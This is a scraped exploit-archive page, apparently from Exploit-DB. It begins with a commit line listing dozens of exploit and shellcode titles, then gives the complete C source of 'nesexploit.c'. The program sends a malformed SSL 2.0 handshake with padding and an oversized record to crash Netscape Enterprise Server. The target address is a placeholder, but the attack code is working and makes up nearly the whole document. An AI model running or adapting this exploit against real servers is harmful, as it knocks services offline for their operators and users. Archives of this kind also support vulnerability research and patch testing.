880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
132 lines
No EOL
3.5 KiB
C
132 lines
No EOL
3.5 KiB
C
/*
|
|
source: https://www.securityfocus.com/bid/516/info
|
|
|
|
Netscape's Enterprise Server suffers from a buffer overflow error in the SSL handshaking code that causes it to crash when the buffer is overrun.
|
|
*/
|
|
|
|
//
|
|
// nesexploit.c - v1.02 - by Arne Vidstrom, winnt@bahnhof.se
|
|
//
|
|
// This program crashes Netscape Enterprise Server when it is
|
|
// running in SSL mode, by exploiting a bug in the SSL handshake
|
|
// code. The server crashes if the client:
|
|
//
|
|
// * starts with SSL 2.0 format
|
|
// * uses long record header
|
|
// * uses padding >= 8
|
|
// * sends at least 11 bytes more data than it specifies in the
|
|
// header
|
|
// * sends at least about 4 kb data
|
|
//
|
|
// I haven't included any error handling in the code because it's
|
|
// so boring to write... ;o)
|
|
//
|
|
|
|
#include <winsock.h>
|
|
#include <string.h>
|
|
#include <stdio.h>
|
|
|
|
#define sockaddr_in struct sockaddr_in
|
|
#define sockaddr struct sockaddr
|
|
|
|
// Some combinations of these three constants will crash the server,
|
|
// others will not.
|
|
|
|
#define PADDING 8
|
|
#define SPECIFIED_SIZE 11822
|
|
#define ACTUAL_SIZE 11833
|
|
|
|
void main(void)
|
|
{
|
|
// IP address of the server - set to your own server and nobody
|
|
// elses :o)
|
|
char ipaddr[25] = "xxx.xxx.xxx.xxx";
|
|
|
|
// SSL port
|
|
unsigned short port = xxxxx;
|
|
|
|
SOCKET socket1;
|
|
unsigned char s[65536];
|
|
int errorCode;
|
|
WSADATA winSockData;
|
|
sockaddr_in peer;
|
|
int result;
|
|
unsigned char i;
|
|
unsigned int l;
|
|
int flags;
|
|
|
|
printf("\nnesexploit.c - developed by Arne Vidstrom, winnt@bahnhof.se\n\n");
|
|
|
|
// Allocate a socket, connect and stuff...
|
|
errorCode = WSAStartup(0x0101, &winSockData);
|
|
socket1 = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
|
|
peer.sin_family = AF_INET;
|
|
peer.sin_port = htons(port);
|
|
peer.sin_addr.s_addr = inet_addr(ipaddr);
|
|
for (i = 0; i < 8; i++)
|
|
peer.sin_zero[i] = 0;
|
|
result = connect(socket1, (sockaddr *) &peer, sizeof(peer));
|
|
if (result != 0)
|
|
printf("Ehmn, where's that server? ;o)\n\n");
|
|
|
|
// Initialize the buffer with a lot of '.' Anything would do...
|
|
for (l=0; l<65536; l++)
|
|
s[l] = '.';
|
|
|
|
// Version 2.0 Format Header with padding.
|
|
// Shouldn't be any padding because this part is not encrypted,
|
|
// but without padding the server won't crash. :o)
|
|
s[0] = (SPECIFIED_SIZE & 0xff00) >> 8;
|
|
s[1] = (SPECIFIED_SIZE & 0x00ff);
|
|
s[2] = PADDING;
|
|
|
|
// Client says Hello!
|
|
s[3] = 0x01;
|
|
|
|
// Client wishes to use Version 3.0 later (there will be no "later" though...)
|
|
s[4] = 0x03;
|
|
s[5] = 0x00;
|
|
|
|
// Cipher Specs Length = 3
|
|
s[6] = 0x00;
|
|
s[7] = 0x0c;
|
|
|
|
// Session ID = 0
|
|
s[8] = 0x00;
|
|
s[9] = 0x00;
|
|
|
|
// Challenge Length = 16
|
|
s[10] = 0x00;
|
|
s[11] = 0x10;
|
|
|
|
// Challenge Specs Data
|
|
s[12] = 0x02;
|
|
s[13] = 0x00;
|
|
s[14] = 0x80;
|
|
|
|
s[15] = 0x04;
|
|
s[16] = 0x00;
|
|
s[17] = 0x80;
|
|
|
|
s[18] = 0x00;
|
|
s[19] = 0x00;
|
|
s[20] = 0x03;
|
|
|
|
s[21] = 0x00;
|
|
s[22] = 0x00;
|
|
s[23] = 0x06;
|
|
|
|
// Challenge Data is a few '.' from above
|
|
|
|
// The rest is also '.' from above
|
|
|
|
// Send all this to the server
|
|
flags = 0;
|
|
result = send(socket1, s, ACTUAL_SIZE, flags);
|
|
if (result != SOCKET_ERROR)
|
|
printf("Done!\n\n");
|
|
|
|
// Clean up
|
|
closesocket(socket1);
|
|
WSACleanup();
|
|
} |